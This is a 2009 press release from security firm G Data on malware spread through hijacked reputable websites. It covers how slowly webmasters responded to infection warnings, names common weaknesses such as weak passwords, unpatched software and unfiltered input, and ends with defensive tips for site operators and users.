Virus 'spray gun' websites: the risk of infection lurks everywhere

Website operators are sluggish about dealing with malware infections

10/08/2009 | Bochum (Germany) 

Beware the risk of infection: malware programs do not just lurk in the darker recesses of the Internet. German security software manufacturer G Data is paying careful attention to the trend in malware that can automatically install itself via 'drive-by download' without the user noticing - and that is being found more and more frequently on reputable websites. So how are the operators of the websites concerned responding? G Data put this to the test and contacted providers whose webservers have been distributing massive quantities of malware. The controversial conclusion: 45 percent of webmasters took several weeks to remove their malware 'spray guns' from the Internet - if they did at all.

As part of its Malware Information Initiative, G Data has been paying particular attention to the spread of malware across the Internet in recent months. The popularity of this method of distributing malware is evident from the fact that email has since been displaced as the main method of distribution. So how do online criminals manage to abuse reputable websites for their own purposes? Ralf Benzmueller, Head of G Data Security Labs, explains the three most popular methods used by perpetrators.

"Cyber criminals who are distributing their malware via hijacked websites exploit three major weaknesses: access to the webserver is often secured using weak passwords such as admin123. These can be cracked in seconds using so-called 'dictionary attacks' that run completely automatically," says Ralf Benzmueller.

But it is not just weak passwords that make it easy for online criminals to hijack websites. There are also frequently exploited weak spots containing webserver programs that are deployed to run e.g. online shops, content management systems or blog and forum software. "These frequently run in standard configurations or exhibit numerous security holes caused by insufficient updating. Special queries on search engines can be used to locate vulnerable computers very quickly, then automatically attack them and take them over. This makes it particularly important for webserver operators to carry out regular software updates. Unfiltered user entries, e.g. in website forms, provide another gateway that can be used for cross site scripting attacks or SQL injections. Unfortunately, a sequence of filter modules provides insufficient protection and attackers are becoming ever more successful in using this method for injecting malware into websites."

Weak passwords, security holes in webserver software and inadequate filtering of user entries are just some of the ways that operators enable or make it easy for crooks to attack websites.

Despite a warning, no response after three weeks!
Many PC users have since become clearly aware of the dangers that lurk on the web. However they assume that attacks will not come from the sites of reputable providers such as hotels, action groups or web communities. As part of the G Data Malware Information Initiative, experts keep running into web servers from these sectors that are distributing malware. To render these centres of infection harmless, G Data regularly contacts the operators responsible. The German security specialist's experiences in doing so vary greatly. Of greatest concern is the sluggish reaction of those responsible: out of 100 website operators that G Data contacted in the context of this research, only 55 reacted within a week.

The reaction time of the website operators: 



"As soon as we discover malware on a website, we tell those responsible of the options we offer, to stop the malware from being spread as quickly as possible. But in many cases we have to report that the responses to this were extremely slow or non-existent. For example, we recently told a well-known sports retailer from Stuttgart that there was malware on their website. Three weeks later this computer virus was still active - we can only guess at how many users have had their PCs infected by it," continues Benzmueller. "We wish more website operators would take their responsibility towards the users of their website seriously. Anyone who does not want to be drawn into the machinations of online criminals needs to check their webserver regularly and, if necessary, respond quickly and effectively."

G Data security tips: 
The possibilities for manipulation are endless and it is not always easy for webmasters to track down the source of an infection. Websites are often constructed using different components. All it takes is for just one element of the site to be infected or for the construction of the website to be modified in such a way that a line of malware code can be added to each page.

Because of the increasing number of hacker attacks, G Data urgently recommends operators to check their webserver for viruses regularly and to respond as quickly as possible if they find one.

The options for perpetrators can be significantly reduced by observing the following tips:

  1. Security updates to the web application software should be promptly installed. This is the only way to close critical holes before they can be used in some greater capacity. Unfortunately, the time period between a patch being published and some attempt at an attack can be very small.
  2. Antivirus programs are not meant to fail on any computer - nor should they on a webserver. Care should also be taken that they are equipped with the most up-to-date virus signatures.
  3. Website operators should regularly check the offline versions of their site with a virus scanner. This way, even well hidden malware can be found quickly.
  4. If an infection should occur, web administrators should change all access passwords immediately. This will stop attackers from being able to attack the server again the following day.
  5. Users should be careful that their browser and plug-ins are always kept fully up-to-date. Antiquated programs ('software dinosaurs') often contain security holes that are used by perpetrators for smuggling in malware code.
  6. PC users should use virus protection that permanently checks the content of websites for malware. This enables malware to be quickly found and stopped before it reaches the browser.

Thorsten Urbanski